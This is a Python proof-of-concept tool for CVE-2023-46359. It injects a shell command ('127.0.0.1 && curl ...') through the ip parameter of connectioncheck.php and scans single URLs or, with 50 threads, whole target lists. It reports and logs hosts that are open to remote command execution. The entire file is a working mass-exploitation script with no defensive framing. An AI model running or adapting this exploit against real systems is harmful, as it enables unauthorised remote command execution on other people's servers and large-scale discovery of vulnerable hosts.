import requests,argparse,sys
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    banner = """  ______   __     __  ________        ______    ______    ______    ______           __    __   ______    ______   _______    ______  
 /      \ |  \   |  \|        \      /      \  /      \  /      \  /      \         |  \  |  \ /      \  /      \ |       \  /      \ 
|  $$$$$$\| $$   | $$| $$$$$$$$     |  $$$$$$\|  $$$$$$\|  $$$$$$\|  $$$$$$\        | $$  | $$|  $$$$$$\|  $$$$$$\| $$$$$$$ |  $$$$$$\
| $$   \$$| $$   | $$| $$__  ______  \$$__| $$| $$$\| $$ \$$__| $$ \$$__| $$ ______ | $$__| $$| $$___\$$ \$$__| $$| $$____  | $$__/ $$
| $$       \$$\ /  $$| $$  \|      \ /      $$| $$$$\ $$ /      $$  |     $$|      \| $$    $$| $$    \   |     $$| $$    \  \$$    $$
| $$   __   \$$\  $$ | $$$$$ \$$$$$$|  $$$$$$ | $$\$$\$$|  $$$$$$  __\$$$$$\ \$$$$$$ \$$$$$$$$| $$$$$$$\ __\$$$$$\ \$$$$$$$\ _\$$$$$$$
| $$__/  \   \$$ $$  | $$_____      | $$_____ | $$_\$$$$| $$_____ |  \__| $$              | $$| $$__/ $$|  \__| $$|  \__| $$|  \__/ $$
 \$$    $$    \$$$   | $$     \     | $$     \ \$$  \$$$| $$     \ \$$    $$              | $$ \$$    $$ \$$    $$ \$$    $$ \$$    $$
  \$$$$$$      \$     \$$$$$$$$      \$$$$$$$$  \$$$$$$  \$$$$$$$$  \$$$$$$                \$$  \$$$$$$   \$$$$$$   \$$$$$$   \$$$$$$ 
                                                                                                                                      
                                                                                                                                      
                                                                                                                                      

"""
    print(banner)

def main():
    banner()
    parser = argparse.ArgumentParser(description="CVE-2023-46359")
    parser.add_argument('-u','-url',dest='url',type=str,help="Please input your URL")
    parser.add_argument('-f','-file',dest='file',type=str,help="Please input your File path")
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(50)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    payload = "/connectioncheck.php?ip=127.0.0.1+%26%26+curl+http%3A%2F%2Fwww.baidu.com"
    headers = {     
        'Cache-Control': 'max-age=0',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
    }
    try:
        res1 = requests.get(url=target+payload,headers=headers,verify=False,timeout=5)
        #print(res1.text)
        if res1.status_code == 200 and 'http://www.baidu.com' in res1.text:
            print(f"[+]{target}存在远程命令执行漏洞")
            with open('result.txt','a')as f:
                f.write(target+'\n')
        else:
                print(f"[-]{target}不存在远程命令执行漏洞")
    except Exception as e:
        print(f"Exception occurred: {e}")
if __name__ == "__main__":
    main()
